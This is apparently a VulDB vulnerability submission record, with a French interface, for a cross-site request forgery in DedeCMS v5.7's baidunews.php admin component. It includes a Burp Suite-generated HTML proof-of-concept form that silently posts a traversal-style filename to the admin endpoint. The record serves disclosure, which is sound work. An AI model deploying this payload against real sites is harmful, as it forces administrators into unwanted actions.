| Titre | Github Democms v5.7 CSRF |
|---|
| Description | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/baidunews.php
<html>
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/src/dede/baidunews.php?do=yes" method="POST">
<input type="hidden" name="filename" value="../data/baidunews.xml" />
<input type="hidden" name="button" value="�¼€�§‹�”Ÿ�ˆ" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> |
|---|
| La source | ⚠️ https://github.com/E1CHO/demo/blob/main/26.pdf |
|---|
| Utilisateur | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Soumission | 14/03/2024 10:27 (il y a 2 ans) |
|---|
| Modérer | 22/03/2024 11:37 (8 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 257707 [DedeCMS 5.7 /src/dede/baidunews.php filename cross site request forgery] |
|---|
| Points | 20 |
|---|